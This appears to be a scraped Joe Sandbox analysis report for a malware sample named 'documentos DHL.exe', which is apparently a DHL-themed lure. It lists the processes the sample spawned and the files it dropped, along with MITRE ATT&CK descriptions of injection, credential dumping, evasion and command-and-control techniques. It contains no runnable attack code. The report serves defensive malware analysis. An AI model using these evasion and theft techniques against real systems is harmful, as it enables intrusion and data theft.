Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ExtExport.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report documentos DHL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Americanly.Unc

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Strukturerne.Pom

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll

C:\Windows\Resources\0409\Transcriptive.ini

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
documentos DHL.exe

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre